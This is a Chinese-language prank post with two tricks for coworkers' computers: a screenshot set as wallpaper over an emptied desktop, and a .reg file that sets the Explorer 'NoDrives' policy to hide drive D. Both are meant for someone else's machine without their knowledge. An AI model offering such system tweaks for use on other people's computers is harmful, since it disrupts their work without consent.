PS：由于精力问题没有对代码的可用性进行一一验证，所以不保证全部可用，大家如果发现有不可用的或者需要改进的地方请提出来，以下代码仅供娱乐，请勿用于非法用途。

一、怎么点都没反应的桌面如果同事的电脑开着，他离开电脑前一会，嘿嘿，机会来了。

把他的电脑桌面按print键截屏截下来，（当然QQ截屏也可以，不过效果不太逼真！）建议大家用print截屏，设置为桌面。

然后把原来在桌面上的文件统统移到一个盘的文件夹里，这样桌面看上去和平时一个样。

他回来后狂点鼠标，却怎么都没有反应！现在还在关机,开机,关机,开机,关机,开机中…………附带：print键截屏方法：键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图！用法一，按“Print Screen SysRq”一下，对当前屏幕进行抓图，就是整个显示屏的内容。

用法二，先按住“Alt”键，再按“Print Screen SysRq”键，则是对当前窗口进行抓图。

如你打开“我的电脑”后，用此法就抓取“我的电脑”窗口的内容。

用上诉两种方法抓图后，再打开“开始”、“附件”里的“画图”程序，点“编辑”、“粘贴”就把抓取的图片贴出来了，可以保存为自己需要的格式。

哈哈，简单吧，这方法真挺搞的，有兴趣的童鞋可以试试！二、让电脑硬盘消失－隐藏磁盘方法愚人节电脑整人使无端端地电脑磁盘的某个分区消失了，钻进地缝里面去了吗，给外星人抓走了？？非也！是某些人使坏将其隐藏起来了！步骤1.新建一个记事本2.将记事本的后缀改为.reg，就是将“新建文件.txt”改为“新建文件.reg”3.将下面的代码复制到记事本当中：Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00解释（1）"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的图中的D盘已经神秘消失了。